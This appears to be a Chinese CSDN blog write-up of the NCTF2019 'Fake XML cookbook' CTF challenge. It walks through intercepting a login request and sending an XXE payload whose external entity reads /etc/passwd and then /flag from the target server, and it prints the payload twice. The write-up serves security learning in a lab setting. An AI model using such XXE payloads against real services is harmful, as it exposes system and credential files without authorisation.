练[NCTF2019]Fake XML cookbook

最新推荐文章于 2024-05-20 11:31:07 发布
最新推荐文章于 2024-05-20 11:31:07 发布
阅读量222 收藏 1
点赞数 1
分类专栏: buuctf刷题 文章标签: xml 安全 web安全 笔记 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133387658
版权

[NCTF2019]Fake XML cookbook

文章目录


在这里插入图片描述

掌握知识

​ 利用XXE漏洞进行文件读取

解题思路

  1. 看到标题差不多就感觉是XXE注入了,进入链接发现是一个登录界面,查看页面源码,发现<user><username>的字段,更加确定会是XXE注入了

image-20230928162109439

  1. 打开burp准备抓包,随便写入账号密码,点击login查看抓取的请求包

image-20230928162047738

  1. 通过请求包的请求头数据和post数据,可以确定是XXE漏洞了,直接测试XXE漏洞的payload,利用file协议读取靶机的passwd文件内容。执行XXE注入代码关键的点就在于&admin;,需要把它写入都标签内才能成功执行上面的外部实体的代码
<?xml version = "1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<user><username>&admin;</username><password>aaaa</password></user>

image-20230928162338124

image-20230928162527311

  1. 既然paylaod能成功读取文件,XXE漏洞的flag一般也都放在根目录下,也不会更改复杂的名字,所以尝试读取根目录flag,成功拿下

image-20230928163105050

关键paylaod

<?xml version = "1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<user><username>&admin;</username><password>aaaa</password></user>

<?xml version = "1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]>
<user><username>&admin;</username><password>aaaa</password></user>
生而逢时
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
[NCTF2019]Fake XML cookbook
weixin_55710577的博客
06-23 1686
[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbook XML注入
m0_64180167的博客
09-12 787
看到这个界面就像admin 123456弱口令试试看果然进不去这里有个tips 但是没有办法点击 我们进源代码看看发现源代码中就存在检测账号密码的内容但是不知道该干嘛这里很奇怪 为啥xml我们直接搜搜看xml存在什么漏洞发现存在xml注入漏洞我们来学习一下这是最简单xml注入这里是使用外部实体注入。
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4218
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
NCTF2019 Fake XML cookbook
Tajang的大千世界
02-09 158
发现使用XML存储username和password。将内容发送至Repeater,然后写入恶意实体,注意这里是使用file://协议读取flag文件,并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。蒙了几个username和password都显示错误,看来没有太多提示了。既然题目提示了XML那就百度一波。已知晓XML存在实体注入,引入实体文件,然后读取它就完成注入了。得出flag,感觉挺顺利的,第一次遇见xml实体注入,或者叫XXE攻击。
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
网安小趴菜
09-25 591
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
论文研究 - 健康志愿者皮肤修复的美速疗法配方的临床评估
06-01
我们的主要目标是评估在皮内显微注射NCTF135HA:registered:后面部,颈部和领口皮肤质量的改善情况。 该混合物由FILORGA Laboratories制造,包含非交联的透明质酸,维生素,抗氧化剂,矿物质盐和酶。 观察到鱼尾纹...
[NCTF2019]Fake XML cookbook(特详解)
热门推荐
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
Python库之lxml的简介、安装、使用方法详细攻略
最新发布
shadowtalon的博客
05-20 240
详细解释HTTP请求头可以携带额外的信息,如用户代理、认证信息、内容类型等。在requests中,你可以通过headers参数自定义这些请求头。q=0.5',详细解释除了表单数据和文件,requests还允许你发送自定义的请求体,比如JSON格式的数据。这在使用API时特别有用,因为许多API都要求使用JSON格式。data = {本文详细介绍了requests。
Android XML的使用详解
结合项目案例,记录点点滴滴,自己回顾,分享他人o__o
05-14 376
其实android中定义如此多的XML配置文件,在我看来就是为了达到显示层和数据层的分离,提高了可维护性,也是我们的程序代码变得简洁!!
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值